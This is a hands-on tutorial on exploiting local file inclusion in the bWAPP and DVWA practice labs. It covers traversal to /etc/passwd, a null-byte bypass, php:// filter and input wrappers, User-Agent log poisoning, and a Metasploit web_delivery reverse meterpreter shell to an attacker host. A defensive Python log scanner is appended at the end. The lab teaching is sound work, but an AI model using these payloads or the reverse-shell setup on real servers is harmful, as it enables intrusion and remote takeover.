The main aim of this article is to share the idea of attacking a web server with various techniques when the server suffers from a file inclusion vulnerability. As we are all aware, an LFI vulnerability allows a user to include a file through the URL in the browser. In this article I have used two different platforms, bWAPP and DVWA, which contain a file inclusion vulnerability, and through them I have performed the LFI attack in FOUR different ways.
Basic local file inclusion
Open the target IP in the browser and log in to bWAPP as bee:bug. Now choose the bug "Remote & Local File Inclusion" and click on Hack.
Here the requested web page, which suffers from the RFI & LFI vulnerability, opens. You will find a prompt to select a language from the given drop-down list, and when you click on the Go button the selected language file gets included in the URL. To perform the basic attack, manipulate
http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd
In the basic LFI attack we can directly read the content of a file from its directory using (../) or simply (/). If you look at the screenshot below you will find that I have accessed the password file once the above URL is executed in the browser.
Null byte
In some scenarios the above basic local file inclusion attack may not work because of a higher security level. From the image below you can observe that I failed to read the password file when executing the same path in the URL. When we face this kind of problem, go for the NULL BYTE attack.
Now turn on Burp Suite to capture the browser request, then select the Proxy tab and start Intercept. Do not forget to set the browser proxy while making use of Burp Suite. Now inside Burp Suite send the intercepted data to Repeater.
Inside Repeater you can analyse the sent request and the response it generates. From the screenshot it is clear that /etc/passwd is not working and I am not able to read the password file. From the following screenshot you can see that I forwarded the request after adding a null character at the end of the directory /etc/passwd and clicking on the Go tab. Then on the right side of the window the password file opens as the response.
Base64 encoded
Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content: use the following PHP stream wrapper.
http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd
Here from the screenshot you can see the content of the password file encoded in base64; copy the whole encoded text. I am using HackBar, which is a Firefox plugin, to decode the copied text. Now a pop-up box opens; paste the copied encoded text inside it and click on OK. From the given screenshot you can view the result and read the content of the password file.
PHP Input
Using the php://input wrapper we will execute injected PHP code to exploit the LFI vulnerability. With the help of HackBar I am going to perform this task, in which first we need to load the URL of the targeted web page as you can see in the given screenshot. Now manipulate the above URL using the php://input wrapper. Then select the check box to enable Post data, which will forward the POST request, and add the cmd command in the given text area as shown in the following screenshot; finally click on Execute. This will show the directories of the victim PC.
Now it is time to connect to the victim through a reverse connection; open a terminal in Kali Linux and type msfconsole to start the Metasploit framework. Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in the window below.
Paste the copied PHP code inside the URL as shown in the image and execute it.
When the above URL is executed, the attacker gets the victim's meterpreter session inside Metasploit.
msf exploit (web_delivery)> sessions -i 1
meterpreter> sysinfo
/proc/self/environ
If the server is outdated, then to exploit it through LFI we can include the /proc/self/environ file, which stores the User-Agent, where we will place our PHP code for executing a CMD command. Now start Burp Suite, capture the browser request and send the fetched data to Repeater. Add the cmd command inside the User-Agent and send the request with the GET parameter 192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id as shown in the image below. On the right side of the window you can see the highlighted result as the response.
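As an added example that is not part of the original article, here is a Python scanner a defender can run over web-server access logs to flag the indicators of every technique walked through above: absolute sensitive paths, ../ traversal, the trailing null byte, the php://filter and php://input wrappers, and /proc/self/environ or log-file includes. The log lines are constructed samples mirroring this page's URLs, and the indicator names and regexes are my own choices, not part of any tool.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Regexes for the LFI techniques this page walks through; each is applied to
# the URL-decoded value of every query parameter in a logged request line.
INDICATORS = [
    ("path_traversal", re.compile(r"\.\.[/\\]")),
    ("sensitive_path", re.compile(r"(^|/)(etc/passwd|etc/shadow|proc/self/environ)\b", re.I)),
    ("null_byte", re.compile("\x00")),
    ("php_filter_wrapper", re.compile(r"php://filter", re.I)),
    ("php_input_wrapper", re.compile(r"php://input", re.I)),
    ("log_file_include", re.compile(r"(access|error)\.log\b", re.I)),
]

# Apache/nginx combined-format request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log; the requests mirror the URLs shown on this page.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Oct/2016:13:55:36 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 5123
192.168.1.50 - - [10/Oct/2016:13:56:01 +0000] "GET /bWAPP/rlfi.php?language=/etc/passwd HTTP/1.1" 200 2811
192.168.1.50 - - [10/Oct/2016:13:57:12 +0000] "GET /bWAPP/rlfi.php?language=/etc/passwd%00 HTTP/1.1" 200 2811
192.168.1.50 - - [10/Oct/2016:13:58:40 +0000] "GET /bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 3790
192.168.1.50 - - [10/Oct/2016:13:59:05 +0000] "POST /bWAPP/rlfi.php?language=php://input HTTP/1.1" 200 640
192.168.1.50 - - [10/Oct/2016:14:01:22 +0000] "GET /lfi/lfi.php?file=../../../../proc/self/environ HTTP/1.1" 200 1450
"""

def scan_request_target(target):
    """Return the set of indicator names present in one request target (path + query)."""
    found = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded payloads (%252e%252e%2f).
        decoded = unquote(value)
        found.update(name for name, rx in INDICATORS if rx.search(decoded))
    return found

def scan_access_log(lines):
    """Return (client_ip, status, target, sorted indicators) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line we understand; skip rather than crash
        indicators = scan_request_target(m.group("target"))
        if indicators:
            hits.append((m.group("ip"), m.group("status"), m.group("target"), sorted(indicators)))
    return hits
```

A 200 status beside one of these indicators, as in the sample, is the case worth paging on: the include was attempted and the server answered normally.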